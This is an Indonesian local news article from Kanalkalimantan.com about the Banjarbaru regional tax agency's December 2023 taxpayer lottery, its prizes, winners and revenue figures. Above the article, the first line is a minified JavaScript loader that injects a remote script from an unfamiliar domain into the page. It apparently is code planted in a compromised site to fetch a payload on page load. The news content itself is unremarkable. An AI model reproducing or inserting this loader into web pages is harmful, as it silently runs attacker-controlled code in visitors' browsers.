(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Rusdianto dan Rofii Dapat Umrah Gratis Gebyar Pajak Daerah BPPRD Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Menutup buku akhir tahun 2023, Badan Pengelolaan Pajak dan Retribusi Daerah (BPPRD) Kota Banjarbaru menggelar acara penarikan undian pajak daerah.

Acara berlangsung di halaman kantor BPPRD Kota Banjarbaru, Kamis (21/12/2023) siang, untuk pembayar Pajak Bumi dan Bangunan Perdesaan dan Perkotaan (PBB P2) dan pajak restoran.

Adapun hadiah berupa 2 paket umrah, 5 unit sepeda motor, 25 sepeda listrik, 5 sepeda gunung, dan puluhan doorprize lainnya.

Dua orang yang beruntung mendapat hadiah utama ialah Rusdianto dan Rofii, umrah gratis yang didapat dari struk pembayaran makan di salah satu tenant Q Mall Banjarbaru dan rumah makan di kawasan Guntung Manggis.

Baca juga: Polda Kalsel Turunkan 2.543 Personel Amankan Nataru

Kepala BPPRD Banjarbaru, Kemas Ahmad Rudi Indrajaya mengatakan, tujuan kegiatan penarikan undian pajak daerah PBB-P2 dan pajak restoran untuk mendorong dan meningkatkan kesadaran masyarakat dalam membayar pajak.

“Upaya edukasi sosialisasi pajak, juga sebagai bentuk apresiasi terhadap pembayar pajak daerah di Kota Banjarbaru,” katanya.

Rudi memaparkan catatan Pendapatan Asli Daerah (PAD) Kota Banjarbaru pada tahun 2020 senilai Rp202 miliar, di era Wali Kota Banjarbaru Aditya Mufti Ariffin tahun 2023 berhasil mencapai Rp320 miliar.

Terhitung dari 20 Desember 2023 BPPRD Banjarbaru mencatatkan surplus penerimaan pajak daerah, di tahun 2023 target PAD sebesar Rp170 miliar. Dan capaian realisasi PAD sebesar Rp180 miliar dengan persentase 106 persen.

Baca juga: Polres HSU Siapkan Pasukan Operasi Lilin Intan 2023

“Tiga terbesar penyumbang pajak daerah adalah BPHTB, pajak PJU, dan pajak restoran,” cetusnya.

Penarikan undian dihadiri Wali Kota Banjarbaru, Aditya Mufti Ariffin. Wali Kota Aditya turut memberikan sambutan hangat kepada para peserta yang turut hadir dalam acara ini.

Wali Kota menyampaikan apresiasi tinggi terhadap kontribusi wajib pajak dalam pembangunan kota dan mengajak masyarakat terus mendukung upaya pemerintah dalam menciptakan lingkungan yang nyaman dan berkualitas.

Acara penarikan undian pajak daerah dan pancabutan hadiah ini sukses dilaksanakan berkat kerjasama dan partisipasi aktif dari seluruh lapisan masyarakat.

Baca juga: 7 Rekomendasi Merk Handuk Tebal yang Bagus dan Lembut

“Pada hakikatnya pajak dan retribusi ini adalah dari rakyat dan untuk rakyat, baik dalam pelaksaan pembangunan dan pelayanan yang ada di lingkungan kita, sehingga kesadaran kita bersama dalam melakukan pembayaran pajak dan retribusi,” ucapnya.

“Mudah-mudahan apa yang dilaksanakan pada hari ini adalah sebagai upaya kita meningkatkan pemasukan daerah kita. Alhamdulilah tahun kemarin kita realisasikan PAD sebesar 114%, termasuk kota tertinggi se Indonesia dalam realisasi PAD,” tutupnya. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Muhammad Andi

Recent Posts

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

38 menit ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

3 jam ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

4 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

18 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

20 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

22 jam ago

This website uses cookies.